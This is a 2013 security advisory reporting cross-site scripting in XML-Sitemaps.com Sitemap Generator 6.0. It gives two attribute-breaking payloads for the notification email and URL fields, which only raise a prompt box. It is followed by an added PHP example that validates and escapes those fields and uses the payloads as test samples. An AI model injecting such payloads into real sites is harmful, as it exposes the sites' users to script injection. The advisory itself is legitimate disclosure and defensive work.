XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting

2013-07-02T00:00:00
ID PACKETSTORM:122253
Type packetstorm
Reporter Christy Philip Mathew
Modified 2013-07-02T00:00:00

Description

                                        
# XML-Sitemaps.com Sitemap Generator
# Date: 2nd July 2013
# Author: Christy Philip Mathew (www.offcon.org)
# Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/
# Version: 6.0

*XSS Vulnerability*

(a) Configuration > Miscellaneous Settings > Send email notifications:

Update the email to a@a.com"><img src=x onerror=prompt(0);>

(b) Update the URL input box with

http://site.com"><img src=x onerror=prompt(/XSS/);>

Screenshot Attached

All the Best

*Christy Philip Mathew*
Information Security Researcher
Twitter: @christypriory
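
A hardened handling of the two fields named in (a) and (b), as an added example that is not code from the advisory or from XML-Sitemaps.com. It assumes the generator is a PHP application that writes the saved values back into `value="..."` attributes; the function names, field names and benign sample values are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: names and form layout are assumptions, not the vendor's code.

/** Escape a value for use inside a double- or single-quoted HTML attribute. */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept only a syntactically valid address for the notification setting. */
function valid_notify_email(string $input): bool
{
    return filter_var($input, FILTER_VALIDATE_EMAIL) !== false;
}

/** Accept only absolute http(s) URLs free of markup characters for the start URL. */
function valid_start_url(string $input): bool
{
    if (preg_match('/["\'<>\s]/', $input) === 1) {
        return false;
    }
    $scheme = parse_url($input, PHP_URL_SCHEME);
    return filter_var($input, FILTER_VALIDATE_URL) !== false
        && in_array(strtolower((string) $scheme), ['http', 'https'], true);
}

// The two inputs quoted in the advisory plus benign values (constructed sample set).
$samples = [
    ['email', 'a@a.com"><img src=x onerror=prompt(0);>'],
    ['email', 'admin@example.com'],
    ['url',   'http://site.com"><img src=x onerror=prompt(/XSS/);>'],
    ['url',   'http://site.com/'],
];

foreach ($samples as [$field, $value]) {
    $ok = $field === 'email' ? valid_notify_email($value) : valid_start_url($value);
    // Escape on output even for stored values that passed validation.
    printf("%-5s %-8s <input name=\"%s\" value=\"%s\">\n",
        $field, $ok ? 'accept' : 'reject', $field, attr($value));
}
```

Validation on save narrows what can be stored, but the escaping at output is what stops `">` from closing the attribute, so it is applied to every value regardless of the validation result.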